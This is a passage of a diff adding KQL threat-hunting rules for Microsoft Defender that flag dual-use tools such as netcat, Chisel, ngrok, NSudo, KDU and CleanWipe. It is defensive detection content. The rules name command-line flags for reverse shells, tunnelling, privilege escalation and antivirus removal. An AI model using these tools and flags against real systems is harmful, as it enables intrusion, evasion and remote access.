+// Date: 2022-01-01
+// Level: low
+// Description: This tool enables enumeration and exporting of all DNS records in the zone for recon purposes of internal networks Python 3 and python.exe must be installed,
+// Usee to Query/modify DNS records for Active Directory integrated DNS via LDAP
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1018
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "adidnsdump" and FolderPath endswith "\\python.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/pua_advanced_ip_scanner_execution.kql b/KQL/rules/windows/process_creation/pua_advanced_ip_scanner_execution.kql
new file mode 100644
index 00000000..4a0403e9
--- /dev/null
+++ b/KQL/rules/windows/process_creation/pua_advanced_ip_scanner_execution.kql
@@ -0,0 +1,12 @@
+// Title: PUA - Advanced IP Scanner Execution
+// Author: Nasreddine Bencherchali (Nextron Systems), @ROxPinTeddy
+// Date: 2020-05-12
+// Level: medium
+// Description: Detects the use of Advanced IP Scanner. Seems to be a popular tool for ransomware groups.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1046, attack.t1135
+// False Positives:
+//   - Legitimate administrative use
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "/portable" and ProcessCommandLine contains "/lng") or (FolderPath contains "\\advanced_ip_scanner" or ProcessVersionInfoOriginalFileName contains "advanced_ip_scanner" or ProcessVersionInfoFileDescription contains "Advanced IP Scanner")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/pua_advanced_port_scanner_execution.kql b/KQL/rules/windows/process_creation/pua_advanced_port_scanner_execution.kql
new file mode 100644
index 00000000..87166d63
--- /dev/null
+++ b/KQL/rules/windows/process_creation/pua_advanced_port_scanner_execution.kql
@@ -0,0 +1,13 @@
+// Title: PUA - Advanced Port Scanner Execution
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2021-12-18
+// Level: medium
+// Description: Detects the use of Advanced Port Scanner.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1046, attack.t1135
+// False Positives:
+//   - Legitimate administrative use
+//   - Tools with similar commandline (very rare)
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "/portable" and ProcessCommandLine contains "/lng") or (FolderPath contains "\\advanced_port_scanner" or ProcessVersionInfoOriginalFileName contains "advanced_port_scanner" or ProcessVersionInfoFileDescription contains "Advanced Port Scanner")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/pua_advancedrun_execution.kql b/KQL/rules/windows/process_creation/pua_advancedrun_execution.kql
new file mode 100644
index 00000000..5f4e73f9
--- /dev/null
+++ b/KQL/rules/windows/process_creation/pua_advancedrun_execution.kql
@@ -0,0 +1,10 @@
+// Title: PUA - AdvancedRun Execution
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-01-20
+// Level: medium
+// Description: Detects the execution of AdvancedRun utility
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.defense-evasion, attack.privilege-escalation, attack.t1564.003, attack.t1134.002, attack.t1059.003
+
+DeviceProcessEvents
+| where ProcessVersionInfoOriginalFileName =~ "AdvancedRun.exe" or (ProcessCommandLine contains " /EXEFilename " and ProcessCommandLine contains " /Run") or (ProcessCommandLine contains " /WindowState 0" and ProcessCommandLine contains " /RunAs " and ProcessCommandLine contains " /CommandLine ")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/pua_advancedrun_suspicious_execution.kql b/KQL/rules/windows/process_creation/pua_advancedrun_suspicious_execution.kql
new file mode 100644
index 00000000..f40389f8
--- /dev/null
+++ b/KQL/rules/windows/process_creation/pua_advancedrun_suspicious_execution.kql
@@ -0,0 +1,10 @@
+// Title: PUA - AdvancedRun Suspicious Execution
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-01-20
+// Level: high
+// Description: Detects the execution of AdvancedRun utility in the context of the TrustedInstaller, SYSTEM, Local Service or Network Service accounts
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1134.002
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "/EXEFilename" or ProcessCommandLine contains "/CommandLine") and ((ProcessCommandLine contains " /RunAs 8 " or ProcessCommandLine contains " /RunAs 4 " or ProcessCommandLine contains " /RunAs 10 " or ProcessCommandLine contains " /RunAs 11 ") or (ProcessCommandLine endswith "/RunAs 8" or ProcessCommandLine endswith "/RunAs 4" or ProcessCommandLine endswith "/RunAs 10" or ProcessCommandLine endswith "/RunAs 11"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/pua_chisel_tunneling_tool_execution.kql b/KQL/rules/windows/process_creation/pua_chisel_tunneling_tool_execution.kql
new file mode 100644
index 00000000..42b48bb0
--- /dev/null
+++ b/KQL/rules/windows/process_creation/pua_chisel_tunneling_tool_execution.kql
@@ -0,0 +1,12 @@
+// Title: PUA - Chisel Tunneling Tool Execution
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-09-13
+// Level: high
+// Description: Detects usage of the Chisel tunneling tool via the commandline arguments
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1090.001
+// False Positives:
+//   - Some false positives may occur with other tools with similar commandlines
+
+DeviceProcessEvents
+| where FolderPath endswith "\\chisel.exe" or ((ProcessCommandLine contains "exe client " or ProcessCommandLine contains "exe server ") and (ProcessCommandLine contains "-socks5" or ProcessCommandLine contains "-reverse" or ProcessCommandLine contains " r:" or ProcessCommandLine contains ":127.0.0.1:" or ProcessCommandLine contains "-tls-skip-verify " or ProcessCommandLine contains ":socks"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/pua_cleanwipe_execution.kql b/KQL/rules/windows/process_creation/pua_cleanwipe_execution.kql
new file mode 100644
index 00000000..30b17c8e
--- /dev/null
+++ b/KQL/rules/windows/process_creation/pua_cleanwipe_execution.kql
@@ -0,0 +1,12 @@
+// Title: PUA - CleanWipe Execution
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2021-12-18
+// Level: high
+// Description: Detects the use of CleanWipe a tool usually used to delete Symantec antivirus.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+// False Positives:
+//   - Legitimate administrative use (Should be investigated either way)
+
+DeviceProcessEvents
+| where FolderPath endswith "\\SepRemovalToolNative_x64.exe" or (ProcessCommandLine contains "--uninstall" and FolderPath endswith "\\CATClean.exe") or (ProcessCommandLine contains "-r" and FolderPath endswith "\\NetInstaller.exe") or ((ProcessCommandLine contains "/uninstall" and ProcessCommandLine contains "/enterprise") and FolderPath endswith "\\WFPUnins.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/pua_crassus_execution.kql b/KQL/rules/windows/process_creation/pua_crassus_execution.kql
new file mode 100644
index 00000000..9c3168fe
--- /dev/null
+++ b/KQL/rules/windows/process_creation/pua_crassus_execution.kql
@@ -0,0 +1,12 @@
+// Title: PUA - Crassus Execution
+// Author: pH-T (Nextron Systems)
+// Date: 2023-04-17
+// Level: high
+// Description: Detects Crassus, a Windows privilege escalation discovery tool, based on PE metadata characteristics.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.reconnaissance, attack.t1590.001
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where FolderPath endswith "\\Crassus.exe" or ProcessVersionInfoOriginalFileName =~ "Crassus.exe" or ProcessVersionInfoFileDescription contains "Crassus"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/pua_csexec_execution.kql b/KQL/rules/windows/process_creation/pua_csexec_execution.kql
new file mode 100644
index 00000000..c48bd7b9
--- /dev/null
+++ b/KQL/rules/windows/process_creation/pua_csexec_execution.kql
@@ -0,0 +1,10 @@
+// Title: PUA - CsExec Execution
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-08-22
+// Level: high
+// Description: Detects the use of the lesser known remote execution tool named CsExec a PsExec alternative
+// MITRE Tactic: Resource Development
+// Tags: attack.resource-development, attack.t1587.001, attack.execution, attack.t1569.002
+
+DeviceProcessEvents
+| where FolderPath endswith "\\csexec.exe" or ProcessVersionInfoFileDescription =~ "csexec"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/pua_defendercheck_execution.kql b/KQL/rules/windows/process_creation/pua_defendercheck_execution.kql
new file mode 100644
index 00000000..2cccb8ec
--- /dev/null
+++ b/KQL/rules/windows/process_creation/pua_defendercheck_execution.kql
@@ -0,0 +1,12 @@
+// Title: PUA - DefenderCheck Execution
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-08-30
+// Level: high
+// Description: Detects the use of DefenderCheck, a tool to evaluate the signatures used in Microsoft Defender. It can be used to figure out the strings / byte chains used in Microsoft Defender to detect a tool and thus used for AV evasion.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1027.005
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where FolderPath endswith "\\DefenderCheck.exe" or ProcessVersionInfoFileDescription =~ "DefenderCheck"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/pua_dit_snapshot_viewer.kql b/KQL/rules/windows/process_creation/pua_dit_snapshot_viewer.kql
new file mode 100644
index 00000000..e721b309
--- /dev/null
+++ b/KQL/rules/windows/process_creation/pua_dit_snapshot_viewer.kql
@@ -0,0 +1,12 @@
+// Title: PUA - DIT Snapshot Viewer
+// Author: Furkan Caliskan (@caliskanfurkan_)
+// Date: 2020-07-04
+// Level: high
+// Description: Detects the use of Ditsnap tool, an inspection tool for Active Directory database, ntds.dit.
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003.003
+// False Positives:
+//   - Legitimate admin usage
+
+DeviceProcessEvents
+| where FolderPath endswith "\\ditsnap.exe" or ProcessCommandLine contains "ditsnap.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/pua_fast_reverse_proxy_frp_execution.kql b/KQL/rules/windows/process_creation/pua_fast_reverse_proxy_frp_execution.kql
new file mode 100644
index 00000000..0ede4f6b
--- /dev/null
+++ b/KQL/rules/windows/process_creation/pua_fast_reverse_proxy_frp_execution.kql
@@ -0,0 +1,12 @@
+// Title: PUA - Fast Reverse Proxy (FRP) Execution
+// Author: frack113, Florian Roth
+// Date: 2022-09-02
+// Level: high
+// Description: Detects the use of Fast Reverse Proxy. frp is a fast reverse proxy to help you expose a local server behind a NAT or firewall to the Internet.
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1090
+// False Positives:
+//   - Legitimate use
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "\\frpc.ini" or (MD5 startswith "7D9C233B8C9E3F0EA290D2B84593C842" or SHA1 startswith "06DDC9280E1F1810677935A2477012960905942F" or SHA256 startswith "57B0936B8D336D8E981C169466A15A5FD21A7D5A2C7DAF62D5E142EE860E387C") or (FolderPath endswith "\\frpc.exe" or FolderPath endswith "\\frps.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/pua_iox_tunneling_tool_execution.kql b/KQL/rules/windows/process_creation/pua_iox_tunneling_tool_execution.kql
new file mode 100644
index 00000000..f792faa5
--- /dev/null
+++ b/KQL/rules/windows/process_creation/pua_iox_tunneling_tool_execution.kql
@@ -0,0 +1,12 @@
+// Title: PUA- IOX Tunneling Tool Execution
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-10-08
+// Level: high
+// Description: Detects the use of IOX - a tool for port forwarding and intranet proxy purposes
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1090
+// False Positives:
+//   - Legitimate use
+
+DeviceProcessEvents
+| where FolderPath endswith "\\iox.exe" or (ProcessCommandLine contains ".exe fwd -l " or ProcessCommandLine contains ".exe fwd -r " or ProcessCommandLine contains ".exe proxy -l " or ProcessCommandLine contains ".exe proxy -r ") or (MD5 startswith "9DB2D314DD3F704A02051EF5EA210993" or SHA1 startswith "039130337E28A6623ECF9A0A3DA7D92C5964D8DD" or SHA256 startswith "C6CF82919B809967D9D90EA73772A8AA1C1EB3BC59252D977500F64F1A0D6731")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/pua_kernel_driver_utility_kdu_execution.kql b/KQL/rules/windows/process_creation/pua_kernel_driver_utility_kdu_execution.kql
new file mode 100644
index 00000000..c7b2e1eb
--- /dev/null
+++ b/KQL/rules/windows/process_creation/pua_kernel_driver_utility_kdu_execution.kql
@@ -0,0 +1,14 @@
+// Title: PUA - Kernel Driver Utility (KDU) Execution
+// Author: Matt Anderson, Dray Agha, Anna Pham (Huntress)
+// Date: 2026-01-02
+// Level: high
+// Description: Detects execution of the Kernel Driver Utility (KDU) tool.
+// KDU can be used to bypass driver signature enforcement and load unsigned or malicious drivers into the Windows kernel.
+// Potentially allowing for privilege escalation, persistence, or evasion of security controls.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.privilege-escalation, attack.t1543.003
+// False Positives:
+//   - Legitimate driver development, testing, or administrative troubleshooting (e.g., enabling/disabling hardware)
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "-map " or ProcessCommandLine contains "-prv " or ProcessCommandLine contains "-dse " or ProcessCommandLine contains "-ps ") and ((FolderPath endswith "\\kdu.exe" or FolderPath endswith "\\hamakaze.exe") or ProcessVersionInfoOriginalFileName =~ "hamakaze.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/pua_mouse_lock_execution.kql b/KQL/rules/windows/process_creation/pua_mouse_lock_execution.kql
new file mode 100644
index 00000000..f0a29b3f
--- /dev/null
+++ b/KQL/rules/windows/process_creation/pua_mouse_lock_execution.kql
@@ -0,0 +1,12 @@
+// Title: PUA - Mouse Lock Execution
+// Author: Cian Heasley
+// Date: 2020-08-13
+// Level: medium
+// Description: In Kaspersky's 2020 Incident Response Analyst Report they listed legitimate tool "Mouse Lock" as being used for both credential access and collection in security incidents.
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.collection, attack.t1056.002
+// False Positives:
+//   - Legitimate uses of Mouse Lock software
+
+DeviceProcessEvents
+| where ProcessVersionInfoProductName contains "Mouse Lock" or ProcessVersionInfoCompanyName contains "Misc314" or ProcessCommandLine contains "Mouse Lock_"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/pua_netcat_suspicious_execution.kql b/KQL/rules/windows/process_creation/pua_netcat_suspicious_execution.kql
new file mode 100644
index 00000000..4aa48ba4
--- /dev/null
+++ b/KQL/rules/windows/process_creation/pua_netcat_suspicious_execution.kql
@@ -0,0 +1,12 @@
+// Title: PUA - Netcat Suspicious Execution
+// Author: frack113, Florian Roth (Nextron Systems)
+// Date: 2021-07-21
+// Level: high
+// Description: Detects execution of Netcat. Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1095
+// False Positives:
+//   - Legitimate ncat use
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " -lvp " or ProcessCommandLine contains " -lvnp" or ProcessCommandLine contains " -l -v -p " or ProcessCommandLine contains " -lv -p " or ProcessCommandLine contains " -l --proxy-type http " or ProcessCommandLine contains " -vnl --exec " or ProcessCommandLine contains " -vnl -e " or ProcessCommandLine contains " --lua-exec " or ProcessCommandLine contains " --sh-exec ") or (FolderPath endswith "\\nc.exe" or FolderPath endswith "\\ncat.exe" or FolderPath endswith "\\netcat.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/pua_ngrok_execution.kql b/KQL/rules/windows/process_creation/pua_ngrok_execution.kql
new file mode 100644
index 00000000..0be978cd
--- /dev/null
+++ b/KQL/rules/windows/process_creation/pua_ngrok_execution.kql
@@ -0,0 +1,14 @@
+// Title: PUA - Ngrok Execution
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-05-14
+// Level: high
+// Description: Detects the use of Ngrok, a utility used for port forwarding and tunneling, often used by threat actors to make local protected services publicly available.
+// Involved domains are bin.equinox.io for download and *.ngrok.io for connections.
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1572
+// False Positives:
+//   - Another tool that uses the command line switches of Ngrok
+//   - Ngrok http 3978 (https://learn.microsoft.com/en-us/azure/bot-service/bot-service-debug-channel-ngrok?view=azure-bot-service-4.0)
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " tcp 139" or ProcessCommandLine contains " tcp 445" or ProcessCommandLine contains " tcp 3389" or ProcessCommandLine contains " tcp 5985" or ProcessCommandLine contains " tcp 5986") or (ProcessCommandLine contains " start " and ProcessCommandLine contains "--all" and ProcessCommandLine contains "--config" and ProcessCommandLine contains ".yml") or ((ProcessCommandLine contains " tcp " or ProcessCommandLine contains " http " or ProcessCommandLine contains " authtoken ") and FolderPath endswith "ngrok.exe") or (ProcessCommandLine contains ".exe authtoken " or ProcessCommandLine contains ".exe start --all")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/pua_nimgrab_execution.kql b/KQL/rules/windows/process_creation/pua_nimgrab_execution.kql
new file mode 100644
index 00000000..b373859a
--- /dev/null
+++ b/KQL/rules/windows/process_creation/pua_nimgrab_execution.kql
@@ -0,0 +1,12 @@
+// Title: PUA - Nimgrab Execution
+// Author: frack113
+// Date: 2022-08-28
+// Level: high
+// Description: Detects the usage of nimgrab, a tool bundled with the Nim programming framework and used for downloading files.
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1105
+// False Positives:
+//   - Legitimate use of Nim on a developer systems
+
+DeviceProcessEvents
+| where (MD5 startswith "2DD44C3C29D667F5C0EF5F9D7C7FFB8B" or SHA256 startswith "F266609E91985F0FE3E31C5E8FAEEEC4FFA5E0322D8B6F15FE69F4C5165B9559") or FolderPath endswith "\\nimgrab.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/pua_nircmd_execution.kql b/KQL/rules/windows/process_creation/pua_nircmd_execution.kql
new file mode 100644
index 00000000..da609a4d
--- /dev/null
+++ b/KQL/rules/windows/process_creation/pua_nircmd_execution.kql
@@ -0,0 +1,12 @@
+// Title: PUA - NirCmd Execution
+// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-01-24
+// Level: medium
+// Description: Detects the use of NirCmd tool for command execution, which could be the result of legitimate administrative activity
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1569.002, attack.s0029
+// False Positives:
+//   - Legitimate use by administrators
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains " execmd " or ProcessCommandLine contains ".exe script " or ProcessCommandLine contains ".exe shexec " or ProcessCommandLine contains " runinteractive ") or (FolderPath endswith "\\NirCmd.exe" or ProcessVersionInfoOriginalFileName =~ "NirCmd.exe")) or ((ProcessCommandLine contains " exec " or ProcessCommandLine contains " exec2 ") and (ProcessCommandLine contains " show " or ProcessCommandLine contains " hide "))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/pua_nircmd_execution_as_local_system.kql b/KQL/rules/windows/process_creation/pua_nircmd_execution_as_local_system.kql
new file mode 100644
index 00000000..df76df83
--- /dev/null
+++ b/KQL/rules/windows/process_creation/pua_nircmd_execution_as_local_system.kql
@@ -0,0 +1,12 @@
+// Title: PUA - NirCmd Execution As LOCAL SYSTEM
+// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-01-24
+// Level: high
+// Description: Detects the use of NirCmd tool for command execution as SYSTEM user
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1569.002, attack.s0029
+// False Positives:
+//   - Legitimate use by administrators
+
+DeviceProcessEvents
+| where ProcessCommandLine contains " runassystem "
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/pua_nmap_zenmap_execution.kql b/KQL/rules/windows/process_creation/pua_nmap_zenmap_execution.kql
new file mode 100644
index 00000000..f0fbeaa1
--- /dev/null
+++ b/KQL/rules/windows/process_creation/pua_nmap_zenmap_execution.kql
@@ -0,0 +1,12 @@
+// Title: PUA - Nmap/Zenmap Execution
+// Author: frack113
+// Date: 2021-12-10
+// Level: medium
+// Description: Detects usage of namp/zenmap. Adversaries may attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1046
+// False Positives:
+//   - Legitimate administrator activity
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\nmap.exe" or FolderPath endswith "\\zennmap.exe") or (ProcessVersionInfoOriginalFileName in~ ("nmap.exe", "zennmap.exe"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/pua_nps_tunneling_tool_execution.kql b/KQL/rules/windows/process_creation/pua_nps_tunneling_tool_execution.kql
new file mode 100644
index 00000000..c87421b7
--- /dev/null
+++ b/KQL/rules/windows/process_creation/pua_nps_tunneling_tool_execution.kql
@@ -0,0 +1,12 @@
+// Title: PUA - NPS Tunneling Tool Execution
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-10-08
+// Level: high
+// Description: Detects the use of NPS, a port forwarding and intranet penetration proxy server
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1090
+// False Positives:
+//   - Legitimate use
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " -server=" and ProcessCommandLine contains " -vkey=" and ProcessCommandLine contains " -password=") or ProcessCommandLine contains " -config=npc" or (MD5 startswith "AE8ACF66BFE3A44148964048B826D005" or SHA1 startswith "CEA49E9B9B67F3A13AD0BE1C2655293EA3C18181" or SHA256 startswith "5A456283392FFCEEEACA3D3426C306EB470304637520D72FED1CC1FEBBBD6856") or FolderPath endswith "\\npc.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/pua_nsudo_execution.kql b/KQL/rules/windows/process_creation/pua_nsudo_execution.kql
new file mode 100644
index 00000000..4a6a6c26
--- /dev/null
+++ b/KQL/rules/windows/process_creation/pua_nsudo_execution.kql
@@ -0,0 +1,12 @@
+// Title: PUA - NSudo Execution
+// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali
+// Date: 2022-01-24
+// Level: high
+// Description: Detects the use of NSudo tool for command execution
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1569.002, attack.s0029
+// False Positives:
+//   - Legitimate use by administrators
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "-U:S " or ProcessCommandLine contains "-U:T " or ProcessCommandLine contains "-U:E " or ProcessCommandLine contains "-P:E " or ProcessCommandLine contains "-M:S " or ProcessCommandLine contains "-M:H " or ProcessCommandLine contains "-U=S " or ProcessCommandLine contains "-U=T " or ProcessCommandLine contains "-U=E " or ProcessCommandLine contains "-P=E " or ProcessCommandLine contains "-M=S " or ProcessCommandLine contains "-M=H " or ProcessCommandLine contains "-ShowWindowMode:Hide") and ((FolderPath endswith "\\NSudo.exe" or FolderPath endswith "\\NSudoLC.exe" or FolderPath endswith "\\NSudoLG.exe") or (ProcessVersionInfoOriginalFileName in~ ("NSudo.exe", "NSudoLC.exe", "NSudoLG.exe")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/pua_pingcastle_execution.kql b/KQL/rules/windows/process_creation/pua_pingcastle_execution.kql
new file mode 100644
index 00000000..5f6dcfbb
--- /dev/null
+++ b/KQL/rules/windows/process_creation/pua_pingcastle_execution.kql
@@ -0,0 +1,10 @@
+// Title: PUA - PingCastle Execution
+// Author: Nasreddine Bencherchali (Nextron Systems), frack113
+// Date: 2024-01-11
+// Level: medium
+// Description: Detects the execution of PingCastle, a tool designed to quickly assess the Active Directory security level.
+// MITRE Tactic: Reconnaissance
+// Tags: attack.reconnaissance, attack.t1595
+
+DeviceProcessEvents
+| where ((MD5 startswith "f741f25ac909ee434e50812d436c73ff" or MD5 startswith "d40acbfc29ee24388262e3d8be16f622" or MD5 startswith "01bb2c16fadb992fa66228cd02d45c60" or MD5 startswith "9e1b18e62e42b5444fc55b51e640355b" or MD5 startswith "b7f8fe33ac471b074ca9e630ba0c7e79" or MD5 startswith "324579d717c9b9b8e71d0269d13f811f" or MD5 startswith "63257a1ddaf83cfa43fe24a3bc06c207" or MD5 startswith "049e85963826b059c9bac273bb9c82ab" or MD5 startswith "ecb98b7b4d4427eb8221381154ff4cb2" or MD5 startswith "faf87749ac790ec3a10dd069d10f9d63" or MD5 startswith "f296dba5d21ad18e6990b1992aea8f83" or MD5 startswith "93ba94355e794b6c6f98204cf39f7a11" or MD5 startswith "a258ef593ac63155523a461ecc73bdba" or MD5 startswith "97000eb5d1653f1140ee3f47186463c4" or MD5 startswith "95eb317fbbe14a82bd9fdf31c48b8d93" or MD5 startswith "32fe9f0d2630ac40ea29023920f20f49" or MD5 startswith "a05930dde939cfd02677fc18bb2b7df5" or MD5 startswith "124283924e86933ff9054a549d3a268b" or MD5 startswith "ceda6909b8573fdeb0351c6920225686" or MD5 startswith "60ce120040f2cd311c810ae6f6bbc182" or MD5 startswith "2f10cdc5b09100a260703a28eadd0ceb" or MD5 startswith "011d967028e797a4c16d547f7ba1463f" or MD5 startswith "2da9152c0970500c697c1c9b4a9e0360" or MD5 startswith "b5ba72034b8f44d431f55275bace9f8b" or MD5 startswith "d6ed9101df0f24e27ff92ddab42dacca" or MD5 startswith "3ed3cdb6d12aa1ac562ad185cdbf2d1d" or MD5 startswith "5e083cd0143ae95a6cb79b68c07ca573" or MD5 startswith "28caff93748cb84be70486e79f04c2df" or MD5 startswith "9d4f12c30f9b500f896efd1800e4dd11" or MD5 startswith "4586f7dd14271ad65a5fb696b393f4c0" or MD5 startswith "86ba9dddbdf49215145b5bcd081d4011" or MD5 startswith "9dce0a481343874ef9a36c9a825ef991" or MD5 startswith "85890f62e231ad964b1fda7a674747ec" or MD5 startswith "599be548da6441d7fe3e9a1bb8cb0833" or MD5 startswith "9b0c7fd5763f66e9b8c7b457fce53f96" or MD5 startswith "32d45718164205aec3e98e0223717d1d" or MD5 startswith "6ff5f373ee7f794cd17db50704d00ddb" or MD5 startswith "88efbdf41f0650f8f58a3053b0ca0459" or MD5 startswith "ef915f61f861d1fb7cbde9afd2e7bd93" or MD5 startswith "781fa16511a595757154b4304d2dd350" or MD5 startswith "5018ec39be0e296f4fc8c8575bfa8486" or MD5 startswith "f4a84d6f1caf0875b50135423d04139f") or (SHA1 startswith "9c1431801fa6342ed68f047842b9a11778fc669b" or SHA1 startswith "c36c862f40dad78cb065197aad15fef690c262f2" or SHA1 startswith "bc8e23faea8b3c537f268b3e81d05b937012272d" or SHA1 startswith "12e0357658614ff60d480d1a6709be68a2e40c5f" or SHA1 startswith "18b33ab5719966393d424a3edbfa8dec225d98fa" or SHA1 startswith "f14c9633040897d375e3069fddc71e859f283778" or SHA1 startswith "08041b426c9f112ad2061bf3c8c718e34739d4fc" or SHA1 startswith "7be77c885d0c9a4af4cecc64d512987cf93ba937" or SHA1 startswith "72dbb719b05f89d9d2dbdf186714caf7639daa36" or SHA1 startswith "5b1498beb2cfb4d971e377801e7abce62c0e315b" or SHA1 startswith "292629c6ab33bddf123d26328025e2d157d9e8fc" or SHA1 startswith "be59e621e83a2d4c87b0e6c69a2d22f175408b11" or SHA1 startswith "0250ce9a716ab8cca1c70a9de4cbc49a51934995" or SHA1 startswith "607e1fa810c799735221a609af3bfc405728c02d" or SHA1 startswith "ab1c547f6d1c07a9e0a01e46adea3aae1cac12e3" or SHA1 startswith "044cf5698a8e6b0aeba5acb56567f06366a9a70a" or SHA1 startswith "ef2dea8c736d49607832986c6c2d6fdd68ba6491" or SHA1 startswith "efffc2bfb8af2e3242233db9a7109b903fc3f178" or SHA1 startswith "5a05d4320de9afbc84de8469dd02b3a109efb2d4" or SHA1 startswith "a785d88cf8b862a420b9be793ee6a9616aa94c84" or SHA1 startswith "5688d56cbaf0d934c4e37b112ba257e8fb63f4ea" or SHA1 startswith "5cd2ada1c26815fbfd6a0cd746d5d429c0d83a17" or SHA1 startswith "81d67b3d70c4e855cb11a453cc32997517708362" or SHA1 startswith "9cffce9de95e0109f4dfecce0ab2cb0a59cc58ad" or SHA1 startswith "09c6930d057f49c1c1e11cf9241fffc8c12df3a2" or SHA1 startswith "e27bf7db8d96db9d4c8a06ee5e9b8e9fcb86ac92" or SHA1 startswith "9e3c992415e390f9ada4d15c693b687f38a492d1" or SHA1 startswith "3f34a5ee303d37916584c888c4928e1c1164f92a" or SHA1 startswith "ea4c8c56a8f5c90a4c08366933e5fb2de611d0db" or SHA1 startswith "3150f14508ee4cae19cf09083499d1cda8426540" or SHA1 startswith "036ad9876fa552b1298c040e233d620ea44689c6" or SHA1 startswith "3a3c1dcb146bb4616904157344ce1a82cd173bf5" or SHA1 startswith "6230d6fca973fa26188dfbadede57afb4c15f75c" or SHA1 startswith "8f7b2a9b8842f339b1e33602b7f926ab65de1a4d" or SHA1 startswith "a586bb06b59a4736a47abff8423a54fe8e2c05c4" or SHA1 startswith "c82152cddf9e5df49094686531872ecd545976db" or SHA1 startswith "04c39ffc18533100aaa4f9c06baf2c719ac94a61" or SHA1 startswith "e082affa5cdb2d46452c6601a9e85acb8446b836" or SHA1 startswith "a075bfb6cf5c6451ce682197a87277c8bc188719" or SHA1 startswith "34c0c5839af1c92bce7562b91418443a2044c90d" or SHA1 startswith "74e10a9989e0ec8fe075537ac802bd3031ae7e08" or SHA1 startswith "3a515551814775df0ccbe09f219bc972eae45a10") or (SHA256 startswith "90fd5b855b5107e7abaaefb6e658f50d5d6e08ac28e35f31d8b03dcabf77872b" or SHA256 startswith "5836c24f233f77342fee825f3cad73caab7ab4fb65ec2aec309fd12bc1317e85" or SHA256 startswith "e850e54b12331249c357a20604281b9abf8a91e6f3d957463fc625e6b126ef03" or SHA256 startswith "9e752f29edcd0db9931c20b173eee8d4d8196f87382c68a6e7eb4c8a44d58795" or SHA256 startswith "7a8c127d6c41f80d178d2315ed2f751ac91b1cd54d008af13680e04f068f426f" or SHA256 startswith 